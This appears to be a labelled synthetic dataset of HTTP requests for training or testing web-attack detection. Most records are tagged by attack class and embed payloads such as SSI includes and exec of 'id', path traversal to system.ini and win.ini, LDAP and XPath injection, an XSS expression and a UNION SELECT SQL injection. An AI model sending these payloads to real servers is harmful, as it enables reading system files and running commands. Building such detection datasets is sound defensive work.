Accept-Encoding: 
Accept-Language: l9mets-ienqsMn;q=0.1, rLea-d, abtis-ltdyiyc;q=0.5, nrel1sz-wa2aatns, e9oeROy-reeeeeh
Cache-Control: no-transform
Client-ip: 67.148.171.174
Cookie: fibc3iey=28952;KbL0o1dyyd=219;6WtDjegbI=18
Cookie2: $Version="5"
Date: Mon, 07 Jul 08 18:34:09 CET
ETag: "z@DKmFLK17Dvv.t9"
Expect: wqReiiom=hhgu2ntu
From: clrwp@noorqoy.ch
If-Modified-Since: Mon, 05 Nov 07 02:03:08 UTC
If-Unmodified-Since: Mon, 02 Aug 04 14:56:19 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 14 Dec 06 23:38:36 GMT
Max-Forwards: 958
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: NTLM dHJzNWVuaHdBYUY2aHN0aGRldG9sZndobWV0czJsRWdoYWk1ZWc=
Authorization: NTLM cnZvbnRScjl1aUpkZHJuaHl0OHRmb3NzZXNlU2RhaW9mNE9vYXRhd1Rl
Range: -43,-33,199214-
Referer: http://www.5eroHop.net/io83/tncuil.nsf
TE: chunked;q=0.6,deflate;q=0.6,chunked;q=0.4
Trailer: If-Range
User-Agent: eV7iuK@aXJ http://www.5CBmbbdi.biz
UA-CPU: StrongARM
UA-Disp: 213,2027,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 084x9415
Via: 2.6 www.osr8a7.js
Transfer-Encoding: oOtNne; ig9m=sooe
Upgrade: anee5/8.2, scSotq/7.5, 3th/0.1, krezts/1.0
Warning: 467 236.48.115.46:4 "dhenjbbwtagatsai" "Wed, 29 Mar 06 13:58:45 UTC"
X-Forwarded-For: 129.38.22.254
X-Serial-Number: 8754080340538
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47890
Start - Id: 39657
class: SSI
GET /ewRbg/eOp7CwkIG3Z-B@/ldsjudogbodoteeegt/axW4/sejseochyTh76hoonnaw/deeto7/ljl422AcndrPtw0l/uYhCsSxuXN1NMov/r4dCdZtmpZw/Ooefl6Hyknedhaee/sMS-vuCB8SZkrpw2@Ul/rZlODLoB.jpg?bcoaks=g%5Ck9n&ooee=09070&yjShsy1cNdes=gv.-iSk5JYpV&tapvsh3oine=12&Uedg=88&5tn=oeeblereemahr&1s7due=oniyMdt&se8wbeyj03Ew=i&uogn1ierro=%27&ntma=1050524832&Etefumnohwce=+ilinknchildIiafee&gRyLm=tmimlaeR&Am3az=ces+&puosts5weniqNvt=%3C%21--+%23include+virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+++++--%3E&ubpat8M8eti=ej HTTP/1.1
Host: 27.131.137.216
Connection: close
Accept: */*
Accept-Charset: euc-kr, iso-8859-3;q=0.9, us-ascii;q=0.0, macintosh;q=0.8
Accept-Encoding: identity;q=0.5, deflate, compress, compress;q=0.7, gzip
Accept-Language: a8gqi6of-sxje;q=0.5, rueS82ir-si;q=0.9, bte9ixr-o, Tvisaq-t7q, atw-e;q=0.4
Cache-Control: only-if-cached
Client-ip: 234.151.124.172
Cookie: xopetx4ileralwv=jeEoaaracih;nodu=636
Cookie2: $Version="9"
Date: Sun, 29 Jul 07 14:25:56 UTC
ETag: W/"WnSUMSz_EUMDwpH_"
Expect: 100-continue
From: l5vtEst@R8caTefna.fr
If-Modified-Since: Sat, 06 Dec 08 02:25:39 CET
If-Unmodified-Since: Wed, 03 Oct 07 05:16:00 UTC
If-Match: "B@3VoxY.xDKOy5mo"
If-None-Match: *
If-Range: *
Max-Forwards: 75
MIME-Version: 5.1
Pragma: oDai=mOwe
Proxy-Authorization: NTLM Mm41YzRyZ2VsbDdzbWxhdHRyeXRzbm1jaHNtc245aXQ=
Authorization: Basic YW5pb2J0Qzc6c01vZWNp
Range: -7190
Referer: http://www.extetr.fr/oNtcbv/wsqrrhc/noroynar.php4
TE: chunked;q=0.6,trailers,trailers
Trailer: Authorization
User-Agent: ssrntrfxawmi6rqueps
UA-CPU: PowerPC
UA-Disp: 9927,407,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8969x195
Via: FTP/3.9 45.117.3.147:0817, 2.3 43.75.210.7
Transfer-Encoding: gzip
Upgrade: o7s/5.6, dipl/2.7
Warning: 182 174.22.41.47 "UhdAhltnsetaa1re" 
X-Forwarded-For: 50.214.174.78
X-Serial-Number: 659531112
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39657
Start - Id: 48381
class: XPathInjection
GET /Cmyrip/lqI3v0uocVzU-RW/pAq9zfDfmfG8Xd/o0LQdmVaVKXHH.l/fh/smiIndRliS7np/3UZqhx.bin?ehoie6d=7&mtates=eaeIt9&hoz6ugirh4=laha&HmetaQperlZPM=917644&fOeeoe=niLe HTTP/1.1
Host: www.8Ltlp0KStn.com
Connection: close
Accept: application/zip, application/rtf;q=0.6, audio/basic;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: leSnt-cszzmR
Cookie2: $Version="15"
Date: Thu, 28 Oct 04 05:22:22 GMT
If-None-Match: *
If-Range: Sun, 29 Jul 07 04:58:07 CET
Max-Forwards: 7
MIME-Version: 4.2
Pragma: agrCfTy=jao
Proxy-Authorization: Digest username="annrnhk"
Referer: /eaoiytTi/zg2uech.gif
User-Agent: 3nbotf'    or  path/child::node()[position()=N]     or  'ebepwaw'    = '
UA-Color: color16

null

End - Id: 48381
Start - Id: 44794
class: PathTransversal
GET /jyGhlIHavn9gMp3@Rp/e5cO/Gf5IFpositionfgPwwinntecho/gVx1obd2wI6DI0taol/rnh2nC3CH8y_s7ra_R3N/ltieattopsbzfb/nsnobsebs/uesiEmdurytboero/o1zMPxlgRh-DETeHSi/gfrxtlh0vda/haidNte.gif?Why=17&shN=U1ioedbj&zauoett87=usc&onHzooe4=.%2F..%2F.%2F..%2F.%2F..%2F.%2F..%2F HTTP/1.1
Host: www.nnqin.cz:80
Connection: sirjhie
Accept: text/xml;q=0.7
Accept-Charset: cp-950, gb2312, x-mac-turkish;q=0.0, x-mac-turkish, windows-874
Accept-Encoding: 
Accept-Language: taoiixor-sn
Cache-Control: no-store
Client-ip: 52.144.27.25
Cookie: utatoui=  iineIe5betweenfromp0nynRdor(;pamr=1tnfh;_8U9jLP=284855;gitsouI=wfnraetuyaoKhe;fieomesrsgh=elsformnahAnedaer\;5ai5ZdIGlJFM=petB7pcnkmCH
Cookie2: $Version="56"
Date: Thu, 13 May 04 17:01:09 UTC
ETag: W/"KXtCY0vftNKQfSIC"
Expect: 100-continue
From: Cmaxdcp@rimabEod.be
If-Modified-Since: Sun, 14 Dec 08 18:48:15 CET
If-Unmodified-Since: Wed, 02 Apr 08 21:37:59 UTC
If-Match: "3nI8a8sNuuQe3il9P"
If-None-Match: *
If-Range: Fri, 01 Jun 07 16:07:58 CET
Max-Forwards: 3
MIME-Version: 7.4
Pragma: ow6lg='nt'
Proxy-Authorization: Digest qop=auth
Authorization: Digest uri=http://www.LIst.org/Raue/prueq9y.cfm
Range: -31658,860-,84040-975982
Referer: http://l9e5us.st/aNeaEfbn/npiaholN.tar.gz
TE: trailers
Trailer: Expect
User-Agent: Mozilla/4.2 (Windows; U; Win98 7.8; op-ey; rv:2.0.7) Gecko/17244827
UA-CPU: MIPS
UA-Disp: 3445,5667,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5717x165
Via: 7.4 www.bcgs.tiff, 2.6 www.YodeE4.shtml, 9.6 25.113.223.183:1
Transfer-Encoding: deflate
Upgrade: ntSos/7.8, twuyc/7.4, v1khi/3.8, ftess/6.0
Warning: 136 www.f72ts.jpeg "daakn3ltgiptelaits" "Sat, 10 Oct 09 20:12:41 UTC"
X-Forwarded-For: 4.75.179.74
X-Serial-Number: 2157159271334
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44794
Start - Id: 40585
class: SSI
GET /genxQPlmyl6sntohore/nheedAlOeeunfhmagork/sdDRYfz__B79TnvZ57P./ao5mrjen/ao_5.-IRXex/pTRo/@input/ih8rfrOlEidedsefa/ZUKNbGYgorh/smtrihnbi3tTen0Ict/lGzxcuUZxD0.php4?qdv=%3C%21--++%23include++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++++--%3E HTTP/1.0
Host: www.gddilets.ch:105
Connection: emIAsl
Accept: audio/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: tNdmret-g;q=0.9, t-uruqsu;q=0.8, oeetre-eheka, pbt-igStai;q=0.1, lotelnj-yet;q=0.5
Cache-Control: min-fresh=1012
Client-ip: 92.209.102.245
Cookie: thnrhoEdmnp=ep9;waAd3M=dyEt;CoieB6 5ht/as;mL0bcVKpC=0586465;nnCidon=3;ysrptr=aytT;IcitgNnd8aw=11
Cookie2: $Version="87"
Date: Tue, 13 Jan 04 24:12:13 GMT
ETag: W/"EXHqUE1sKM-1Vamg"
Expect: 100-continue
From: ws8c3i@tat8.st
If-Modified-Since: Mon, 17 Sep 07 15:40:10 CET
If-Unmodified-Since: Wed, 03 Oct 07 07:47:18 UTC
If-Match: *
If-None-Match: "10NMIYLopGb8ZYm4"
If-Range: Mon, 28 Jun 04 03:25:44 GMT
Max-Forwards: 0429
MIME-Version: 9.4
Pragma: Noo=w
Proxy-Authorization: NTLM eXNIb3R0ZWE5enRuYWlucm5JNWFldGxFYTNxYXJtNm9ubm90
Authorization: NTLM cGZpbnRldDZlY254MW1Bc3Joc2VyanBuVHlzOHl0cGV6dDdyc3J2TWlocGl4
Range: 044301-645,550-25
Referer: http://www.nadc.it/9sea.js
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: woqe/7.3
UA-CPU: StrongARM
UA-Disp: 8798,956,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 8517x087
Via: lae/1.6 45.217.56.20, 6.2 www.suitk.shtml, HTTP/6.1 www.lsoi.js:03
Transfer-Encoding: identity
Upgrade: esy/0.2, er0/7.6, eho4t/0.2
Warning: 835 www.trhpd.htm "psE9Ldemvcians32" "Sun, 26 Nov 06 20:41:29 UTC"
X-Forwarded-For: 163.253.181.70
X-Serial-Number: 69115
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40585
Start - Id: 45828
class: PathTransversal
GET /1eeamguediobadnrhg/childVunionQni0q/iygwEa3ani/m90weD_m6/dBinwn/P3XOqSUx/1.RVrups6LbN/nTYg6vcpf8uE/rstgrl9iMuPhas/KfDNhtpassinsertpasswdoQz0M-.mdb?GlyOF2iZyh=arHimgexoO&a@wgetH2=9840301742&stbhc=1923&oefy=5496&enmiobqeebi=..........................WINNTsystem.ini HTTP/1.1
Host: 70.209.93.208
Connection: close
Accept: audio/*, application/*, text/xml;q=0.5
Accept-Charset: iso-8859-3;q=0.0, windows-1254;q=0.1, macintosh, windows-1258, windows-1258
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: min-fresh=73
Client-ip: 106.190.4.232
Cookie: isCniOnDei=154;GipVto1=7?ge>|;ceooeren0=4;fspmodcta=yRbQ.x;je-2Qsf=b@a+:sfolrk0emle
Cookie2: $Version="38"
Date: Wed, 20 Aug 08 14:07:47 CET
ETag: W/"0Tmw.hj-HlQDAFpQyyGj"
Expect: tons32
From: Ea5ne@1d8iisnai.ch
If-Modified-Since: Sun, 28 May 06 20:36:37 UTC
If-Unmodified-Since: Wed, 28 Jan 09 08:24:56 GMT
If-Match: *
If-None-Match: "uf0dZuS80SikLXT7"
If-Range: *
Max-Forwards: 6211
MIME-Version: 9.7
Proxy-Authorization: Digest uri=http://www.ncrl8sh.ch/2nled.asp
Authorization: NTLM czR1Z2V0dG9nbmVveXJhZWxzaHJhc2NSNHVjbTFydHN0dXRPdXB3ZXd0
Range: 09236-
Referer: http://www.dwtNTxt.uk/nsaeCk/eronk/IeTd/teEkoreo/7etOis.cgi
TE: chunked,deflate;q=0.0,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/9.7 (Windows; U; WinNT 8.4; og-yf; rv:6.7.7) Gecko/51510741
UA-Pixels: 1524x385
Via: ee7haM/9.0 www.tbog.png, 1.7 www.e0orOtoR.tiff
Transfer-Encoding: compress
Upgrade: nhla/4.5
Warning: 559 www.tI7c.css "nAtao" 
X-Serial-Number: 25397478987579
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45828
Start - Id: 37236
class: LdapInjection
GET /jTysioidh3llqErmj/kcxtermm/sjdSHBWndfKo3LWt/sR_u5BjG.png?bmyIesantaci2ei=3f&4Tp_tkL=%3DedocumentpE&rie=%28wsI%28fzcimicj5fc%3B3o&tsaarioni7hno=t8uu&mmarOanDCes=8dnetcat%3CscicoapsaEt&gstBSsn=hi1reoctiaieBi&ir=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.0
Host: www.epolr.ch
Connection: s7ttuieE
Accept: */*;q=0.4
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: ou-teoa;q=0.7, eO6esia-se;q=0.2, traisrsy-iwp;q=0.2, ieen-iauyaeo;q=0.5, ribhbS-jrt;q=0.9
Cache-Control: no-transform
Client-ip: 250.42.148.250
Cookie: LXWXusrImM=71088146;dfrtvriruTbegY=bHr;p;nhgooo=475371673;LUbKZQFdrOs=eancoWAcwe;npiG=zJkGZz3;b6Tqt7NeQv@r=teasnlihi
Cookie2: $Version="79"
Date: Fri, 13 Feb 04 17:44:34 CET
ETag: "6rrN9a41Ue-7eg8e0W0"
Expect: nnsar
From: 87ho@Inuowxs.net
If-Modified-Since: Sat, 11 Oct 08 08:53:22 CET
If-Unmodified-Since: Tue, 21 Nov 06 04:11:53 CET
If-Match: "NL2X7@61VdelnlGgi"
If-None-Match: *
If-Range: Thu, 01 Jul 04 21:53:41 CET
Max-Forwards: 54
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Basic c2FlYTpmYmVUdGU=
Range: 38889-,402727-278555
Referer: http://www.neke.org/otaoeqcd.bin
TE: trailers,chunked;q=0.4
Trailer: Via
User-Agent: atyyoedy
UA-CPU: PowerPC
UA-Disp: 836,441,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 322x932
Via: 9.4 8.82.230.223, HTTP/8.6 184.73.164.59, saehx/6.9 196.2.63.78
Transfer-Encoding: compress
Upgrade: aybij/7.6, 6sthiq/6.8, nNx/6.1, wAen/2.4, 0taES/8.7
Warning: 543 62.152.4.78 "sexZEtEFnort" 
X-Forwarded-For: 217.7.45.94
X-Serial-Number: 9354462419781975
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37236
Start - Id: 40448
class: SSI
GET /uds0.htm?ab2igi=ie9eP&6hnCzm9eeeoo=t&btSj=iwlepuntthrrlA&xm=eYj&heot6n=q8ttrup&gcihi9setut49=edwhere&X-.g=%3C%21--%23include++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+--%3E&imnR0=t%2B HTTP/1.0
Host: www.ctaietoah.de
Connection: close
Accept: text/xml;q=0.3, audio/*;q=0.7
Accept-Charset: windows-1250;q=0.1, x-mac-ce, utf-8;q=0.0
Accept-Encoding: identity, deflate;q=0.0, gzip;q=0.1
Accept-Language: anitmr-2ahhheha, f-a;q=0.9, z5u8-rd, ae-oeswa9ww, onsohwCr-4qagn;q=0.9
Cache-Control: no-store
Client-ip: 72.82.95.101
Cookie: ikry71rli=peoma3eEcf4leb
Cookie2: $Version="879"
Date: Mon, 02 Jan 06 14:09:06 GMT
ETag: W/"VV0zyI0DX0STgMmQ34h"
Expect: 100-continue
If-Modified-Since: Thu, 11 Dec 08 10:35:25 GMT
If-Unmodified-Since: Wed, 20 Sep 06 05:28:12 CET
If-Match: *
If-None-Match: "Rku@O.tZCM7jQAR"
If-Range: "dRvIvZRddlTCwMD7U"
Max-Forwards: 3
MIME-Version: 3.0
Pragma: atx='wnt5'
Proxy-Authorization: 2eg8q 4ltgtAr9=na5Ilsmg
Authorization: NTLM aW9yaWF4ZTN2UXptdHFobHNhaWZ0YW5hbm5lSWwwZHdyd2NwZg==
Range: 648391-0593,082-86156,297927-83
Referer: http://www.dolwbhxh.ch/eeebnoyf/ZceeN.bin
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.0 (compatible; MSIE 0.2; Win 9x; 5yasoeftg; p1se)
UA-CPU: 68000
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4401x4707
Via: FTP/8.2 www.nlgh.gif, 1.9 23.146.8.146
Transfer-Encoding: deflate
Upgrade: Fet/1.1, nsHe/6.2
Warning: 037 www.zncew.jpg "u3loce3odp3oeC" 
X-Forwarded-For: 211.36.21.124
X-Serial-Number: 9011770
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 40448
Start - Id: 44815
class: PathTransversal
GET /mphHiEnTjc/e_Z4072M/tnr5segSiigx/e5Sh5sU32@2MviV.E1z2/tp3NJ07bhuh3Lhx/r1Y/mgM1vR/tat/z-DFn@avlLCAXj1.U.5m/i6d.mu5Oit/B0PG.msf?YknJa4E_B0union=.%2F..%2F..%2F..%2F..%2F..%2F&mkq=em+ou&yioedaeorexeeu=93391138 HTTP/1.1
Host: www.etecDs8i7F.de
Connection: keep-alive
Accept: application/rtf;q=0.7, video/*;q=0.7
Accept-Charset: iso-8859-3
Accept-Encoding: compress
Accept-Language: ninpoEmT-1iC;q=0.9, Iea-eIi;q=0.8
Cache-Control: no-cache
Client-ip: 253.244.117.170
Cookie: W2X-9gGQI=slRmwmdhq;id0csz=>eavz@8Nt;t5m3mhruur=e0iss
Cookie2: $Version="23"
Date: Thu, 19 Aug 04 16:15:00 GMT
ETag: "5dTB3_gAXG5Nx4RIfSTO"
Expect: 100-continue
From: srwYoiR5@1klnww.fr
If-Modified-Since: Tue, 17 Apr 07 07:26:09 UTC
If-Unmodified-Since: Sat, 07 Mar 09 19:07:23 GMT
If-Match: "arvxUYUB2bHptKA2"
If-None-Match: *
If-Range: Fri, 16 Feb 07 12:23:00 CET
Max-Forwards: 189
MIME-Version: 9.8
Pragma: s=yaEdmem
Proxy-Authorization: NTLM YUhlQmxaMW5vM090THVlaXJyZXVldG5zRWJvOWhmbmplbm8wcld3c21udlpwZWU=
Authorization: Basic emI4Njp5VGVpb05p
Range: 925-,21-,7-
Referer: /tfGu9/hseeIn.php4
TE: trailers,gzip;q=0.7
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.0 (compatible; kSscOTr; Win 9x; 0ms2ea)
UA-CPU: PowerPC
UA-Disp: 035,8983,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 0162x7659
Via: 4.1 227.203.34.177, 9.3 www.5sAhl2s.shtml
Transfer-Encoding: compress
Upgrade: neacoe/5.1, 7qfTia/9.7, negety/9.4, hbiry/6.4
Warning: 444 49.226.175.61:095 "anooncjio" "Wed, 26 Jul 06 23:48:52 GMT"
X-Forwarded-For: 65.58.42.42
X-Serial-Number: 40759970154914
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44815
Start - Id: 47041
class: XSS
GET /ml/ynaerwn9NYo4/grcuTnshnY0itns1m7.jpeg?iQ4n9=Sot++%22+++++++style%3Dleft%3Aexpression%28alert%28%22+re.ti++%22%29%29+++alt%3D++++%22&orTydfocrh7=615148257&4mEaiuiPA=1660&xFQ-va=bTy&nIIo=suUwetaaatu&EW1WvOnVDM=upthh HTTP/1.0
Host: 176.238.115.102
Connection: keep-alive
Accept: image/jpeg
Accept-Charset: *
Accept-Encoding: *
Accept-Language: Sciaudn-l5, 3sda7r-ctqolttn;q=0.2, bt-u4dwwatr
Cache-Control: no-cache
Client-ip: 71.223.100.67
Cookie: F3=?H\6nZ r2\ 
Cookie2: $Version="76"
Date: Thu, 11 Oct 07 22:30:58 CET
ETag: W/"JuHxQWjnWQYZ_sTjN"
Expect: tbosO4uw=ourpoii
From: hyzyx@lhmoxRAr.net
If-Modified-Since: Fri, 16 Apr 04 17:49:42 UTC
If-Unmodified-Since: Sat, 18 Aug 07 05:16:45 UTC
If-Match: *
If-None-Match: *
If-Range: "d8zBZtD9r-Kt1cAB4fN"
Max-Forwards: 0721
MIME-Version: 0.7
Pragma: jq3=iawdetam
Proxy-Authorization: NTLM WnIwdnBERGM3cmJuZXJsbmk1RWVlZWd0MGllRW9hc21l
Authorization: Digest algorithm=MD5
Range: 255628-2199,-5155,68350-473
Referer: http://meht.fr/e9bsqOe/sInuh/LfnE/osnstN.conf
TE: trailers,trailers,chunked;q=0.7
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.0 (Machintosh; U; PPC 1.2; 7g-n6; rv:4.2.5) Gecko/24868128
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 7231x6416
Via: HTTP/7.5 53.255.9.133, 2.7 195.61.187.212
Transfer-Encoding: identity
Upgrade: 1yiN/0.8, rtga/9.0
Warning: 413 137.174.179.207 "teogEoeOssgndiE" "Tue, 13 Dec 05 15:02:49 UTC"
X-Forwarded-For: 230.76.2.187
X-Serial-Number: 40030380327368685
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47041
Start - Id: 35404
class: SqlInjection
GET /5lGyjCf1GT@a6.cgi?toptUYy=9&dtho9tt7i=aSd&emiipnmqeheo=504936237&y7wJmcL24b_=acsH%2Bna&4admincd2puSJ6like=086144437&Czgachjliby_=paQEjJ&L8lT=n3b1%2B+wsra&ihid=azwei7%7CsnAbetzt&tibrwIc=Uotcoo&JMHt_B0g0GyP=%27%29%2F**%2FUNIONALL%2F**%2FSELECT%2F**%2F25079%2F**%2FFROM%2F**%2Fheh9S0%2F**%2FWHERE%2F**%2F%28++++%27%27+++%3D++%27%2F**%2F&MKXFQ5vgib_=e&tnndbieXni4n=itshi HTTP/1.0
Host: www.5t7wnc.org
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: x-mac-arabic;q=0.2, big5, x-mac-greek
Accept-Encoding: *;q=0.0
Accept-Language: 1a-0mig6n, eF2fm5e-rtaMpS
Cache-Control: LllC=sqrb
Client-ip: 145.236.174.245
Cookie: iOtersyone4=eOesFgpt4v6sl
Cookie2: $Version="1"
Date: Sat, 15 Sep 07 15:32:00 UTC
ETag: "w.bssa@znOLYSv9"
Expect: aeuor=cxtirylr
From: nceooR@ecnsnwaoq4.de
If-Modified-Since: Sat, 04 Mar 06 08:57:18 UTC
If-Unmodified-Since: Thu, 28 Dec 06 10:57:58 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 03 Aug 04 10:24:38 UTC
Max-Forwards: 7500
MIME-Version: 4.3
Pragma: ilmaI='rnS'
Proxy-Authorization: Basic YXdpZHY6dzV0cHNoZnI=
Authorization: NTLM cndvc3RvZWJHZXNmZTU4cmJXaWRvYlNhaWFlMGdlZGk0UnVuNHA=
Range: -67
Referer: http://www.ater.biz/eaiTmSe0/dnrnmss/oaoeas/sm7YeeS8.nsf
TE: gzip
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.8 (Machintosh; U; PPC Mac OS X 9.9; gW-lE; rv:4.0.2) Gecko/52829942
UA-CPU: 68000
UA-Disp: 962,2383,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9837x1680
Via: 7.6 193.239.108.71, FTP/1.5 2.202.219.255, FTP/0.1 www.K2ghici6.jpg
Transfer-Encoding: sawwG; rPdgyO=te8eIg
Upgrade: cd4ali/2.0, 7coFhe/3.3, gftEc/8.2, AtJar/5.6, t7rii/7.9
Warning: 626 www.oshnoh.js "antet8eadasscGdetdy4" "Tue, 26 Sep 06 16:40:30 UTC"
X-Forwarded-For: 165.157.207.111
X-Serial-Number: 840148
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35404
Start - Id: 40007
class: SSI
GET /h9oWEiJfm8g.XbxQdDbs/nmldyiF/TxKRt90k@jYVu/hkXGoq3_tJ/Ddte/R8KVNlog/tz@aU.png?QcektauVg=aautwnJ&au=n&rae=%3C%21++%23%3C%21--+%23exec+++cmd%3D%22id%22--%3E&diSo365g=0348158&oyas2i=4+ HTTP/1.0
Host: www.a9ol5t.com
Connection: close
Accept: text/xml, text/*
Accept-Charset: windows-1252, macintosh
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 21.123.30.222
Cookie: LzGIshutdownr9.P=izUliUqRO;HtdlTedqphsen1=mWawRkCT92pV;ettuf=10;5dtfaik=80
Cookie2: $Version="2"
Date: Fri, 21 Apr 06 05:09:58 CET
ETag: W/"yDGjnJnSi2OEj@O9zPi9"
Expect: hniFtla
From: l1ahde@nablau.fr
If-Modified-Since: Tue, 25 Apr 06 18:11:50 UTC
If-Unmodified-Since: Mon, 04 Jan 10 21:38:22 GMT
If-Match: "I7rA8GDdpMZUlRoZtk"
If-None-Match: "3cWZDBWeMpko2kshKZO"
If-Range: Tue, 20 Sep 05 11:42:18 GMT
Max-Forwards: 610
MIME-Version: 5.0
Pragma: sL=ygcNu
Proxy-Authorization: ehoi omrlLio0=mhlctsr
Authorization: eas1 iwiremv=woet6
Range: 4761-
Referer: /qerpr/t9plsie.cfm
TE: deflate;q=0.1,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/6.1 (Windows; U; Windows NT 8.5; ao-dt; rv:8.4.7) Gecko/66270644
UA-CPU: Sparc
UA-Disp: 603,321,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 860x1351
Via: FTP/8.2 221.151.74.10, HTTP/4.0 www.hnsHa.jpeg, HTTP/7.2 160.153.35.253
Transfer-Encoding: identity
Upgrade: iNatOe/5.8, 1TIi/6.0, rrnz/0.3, ale/7.7
Warning: 490 www.nelmaze.html "8xbzssdeyA" "Sat, 13 Jan 07 10:11:05 GMT"
X-Serial-Number: 18116
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40007
Start - Id: 38522
class: LdapInjection
GET /Ee0rcq8tOthxrds/9fxqXb/f4vBjKe_MSogyyH/YgRi/-p7RwwvtkvibetweeniframetL/ubMVT3zr1.mLXKDv6w.css?7xtrg4qoorpjNa=eeetts1e&5aETeheoroeu5w=20139&dSyxa1htpass0WpB=4619982920&pilw=ehyo9toae0&AlupdateI=%29+++%28+%7C+%28Xl7m%3D5t*%29&crUrogangeetao=likexT&eni=8097 HTTP/1.1
Host: 22.232.109.187
Connection: close
Accept: video/quicktime;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 178.177.169.244
Cookie: EmJ8Jewp-t=Cnulltohe>+t a0w);pitsygbeeo4t2=fsaiaal;ealet=4779;csrsthelsilaz=663
Cookie2: $Version="13"
Date: Thu, 08 Nov 07 09:24:48 UTC
ETag: W/"6cabhDopjWR86jSj8-"
Expect: lsfu4ai=3wee;e2mko=metMe
From: tubi@0dr5so.de
If-Modified-Since: Sat, 10 May 08 07:03:09 UTC
If-Unmodified-Since: Tue, 02 Oct 07 14:59:16 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 15 Sep 08 18:12:11 CET
Max-Forwards: 771
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic ZGU2ZXRmdDoyeG1pc2lsTA==
Authorization: NTLM bWluYXQ2dHR0cWl0cEVpZnkwYW9ucmphZXdlaGlhMWVibkxzcmc=
Range: 548411-,-37195
Referer: http://www.ieeiosrs.it/test/ritntei.jpeg
TE: deflate;q=0.3,gzip
Trailer: Warning
User-Agent: azfb6on
UA-CPU: x86
UA-Disp: 8582,573,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 8726x4401
Via: 5.2 74.26.175.225, HTTP/9.0 www.obtu.gif
Transfer-Encoding: identity
Upgrade: piFi/9.7, A4e1/7.0, 7lsnih/3.7
Warning: 149 www.nAoht.css "snts" 
X-Forwarded-For: 101.186.114.243
X-Serial-Number: 30599
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 38522
Start - Id: 36107
class: PathTransversal
GET /inQhgelendjha57eN/eobduO3eia/ai/e0rhherop1tE3N4iIoas/ipdltuts8Oasd459rep/bV4_mq4p2JKRa/salml.jpeg?Oaax5hll=4&asauREiPtd=970&lvnee=D%3A%5C%5CWINNT%5C%5Cwin.ini&fmIimu=41759181&rlo3achy=inIteduotidus&naa5t=+3o4x36+srallhid HTTP/1.0
Host: 122.17.179.196:80
Connection: close
Accept: audio/x-wav;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: l9-yzno, ofrmO-ttnbr7so;q=0.5, umtaui-escnset, ptnota-iresd;q=0.8
Cache-Control: no-store
Client-ip: 100.85.62.104
Cookie: eeEeara=wllesi7;dl23tdq=OwhndaajtmMtl2;acrc=Adt
Cookie2: $Version="794"
Date: Thu, 18 Feb 10 21:30:04 CET
ETag: "-VT_5zVN82pC9kU9qVgz"
Expect: 100-continue
From: 7Croe@kumvreNv.biz
If-Modified-Since: Fri, 09 Jan 09 15:58:38 GMT
If-Unmodified-Since: Thu, 12 Apr 07 10:51:09 UTC
If-Match: *
If-None-Match: "pNnSrZ5ox0mZd5ut@"
